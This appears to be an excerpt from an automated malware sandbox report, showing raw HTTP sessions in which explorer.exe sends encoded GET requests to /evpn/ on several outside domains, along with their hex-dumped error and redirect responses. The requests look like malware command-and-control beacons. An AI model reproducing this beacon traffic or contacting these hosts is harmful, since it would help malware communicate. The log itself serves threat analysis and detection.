                                                                        Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72
                                                                        Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4r
                                                                        Apr 8, 2021 11:11:30.573568106 CEST5180INData Raw: 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d
                                                                        Data Ascii: em 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1
                                                                        Apr 8, 2021 11:11:30.573580027 CEST5181INData Raw: 20 22 70 74 2d 42 52 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 65 73 73 6f 20 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 56 6f 63 c3 aa 20 6e c3 a3 6f 20 74 65 6d 20 70 65 72
                                                                        Data Ascii: "pt-BR": { "title": "Acesso negado", "content-title": "Voc no tem permisso para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "k
                                                                        Apr 8, 2021 11:11:30.573599100 CEST5182INData Raw: 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 59 6f 75 20 64 6f 20 6e 6f 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 77 65 62 73 69 74 65 22 0a 20 20 7d 2c 0a 20 20 22 68 69 22 3a 20 7b
                                                                        Data Ascii: content-title": "You do not have permission to access this website" }, "hi": { "title": " ", "content-title": "
                                                                        Apr 8, 2021 11:11:30.573612928 CEST5183INData Raw: 20 3c 3d 20 31 30 0a 20 20 20 20 22 65 6e 22 3b 0a 20 20 6c 61 6e 67 75 61 67 65 20 3d 20 6c 61 6e 67 75 61 67 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3b 20 2f 2f 20 53 74 72 69 70 20 63 6f 75 6e 74 72 79 20 63 6f 64 65 0a 20 20 74 72 61 6e
                                                                        Data Ascii: <= 10 "en"; language = language.split("-")[0]; // Strip country code translations = t[language] || t["en"]; // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]");
                                                                        Apr 8, 2021 11:11:30.573626995 CEST5183INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        2192.168.2.34972845.82.188.4080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:11.923106909 CEST1402OUTGET /evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.productsoffholland.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:11.952156067 CEST1403INHTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Content-Length: 706
                                                                        Date: Thu, 08 Apr 2021 09:10:11 GMT
                                                                        Server: LiteSpeed
                                                                        Location: https://www.productsoffholland.com/evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu
                                                                        X-Powered-By: PleskLin
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        3192.168.2.34972935.240.239.4480C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:17.300426006 CEST1404OUTGET /evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.markmalls.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:17.568883896 CEST1405INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Thu, 08 Apr 2021 09:10:17 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.markmalls.com/evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        4192.168.2.34973152.15.160.16780C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:22.820638895 CEST1472OUTGET /evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.zhuledao.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:22.931658030 CEST1474INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 08 Apr 2021 09:10:22 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 153
                                                                        Connection: close
                                                                        Server: nginx/1.16.1
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        5192.168.2.34973752.216.152.4380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:28.155589104 CEST5110OUTGET /evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.jcernadas.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:28.264857054 CEST5111INHTTP/1.1 301 Moved Permanently
                                                                        x-amz-id-2: srg1ay+sKorhhQOGuNMizeaej2IzVeRVjl1MFuHTKFT1bmsVZFO6RdEeFj/WVvZumv+oGef+d2U=
                                                                        x-amz-request-id: J17M5QFC7RV0ZT9A
                                                                        Date: Thu, 08 Apr 2021 09:10:29 GMT
                                                                        Location: http://jcernadas.com/evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu
                                                                        Content-Length: 0
                                                                        Server: AmazonS3
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        6192.168.2.349738198.185.159.14480C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:38.489486933 CEST5112OUTGET /evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.theholisticbirthco.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:38.605370045 CEST5114INHTTP/1.1 400 Bad Request
                                                                        Cache-Control: no-cache, must-revalidate
                                                                        Content-Length: 77564
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Date: Thu, 08 Apr 2021 09:10:38 UTC
                                                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                        Pragma: no-cache
                                                                        Server: Squarespace
                                                                        X-Contextid: yF5waueG/2beIt67k
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
                                                                        Apr 8, 2021 11:10:38.605474949 CEST5115INData Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20
                                                                        Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
                                                                        Apr 8, 2021 11:10:38.605514050 CEST5116INData Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34
                                                                        Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
                                                                        Apr 8, 2021 11:10:38.605544090 CEST5116INData Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75
                                                                        Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
                                                                        Apr 8, 2021 11:10:38.605580091 CEST5118INData Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a
                                                                        Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
                                                                        Apr 8, 2021 11:10:38.605628014 CEST5119INData Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a
                                                                        Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
                                                                        Apr 8, 2021 11:10:38.605669975 CEST5120INData Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77
                                                                        Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
                                                                        Apr 8, 2021 11:10:38.605706930 CEST5122INData Raw: 49 73 56 6e 48 51 76 47 66 48 4a 59 2b 47 73 46 4f 76 65 49 61 4c 6b 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79
                                                                        Data Ascii: IsVnHQvGfHJY+GsFOveIaLkZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3
                                                                        Apr 8, 2021 11:10:38.605743885 CEST5123INData Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53
                                                                        Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
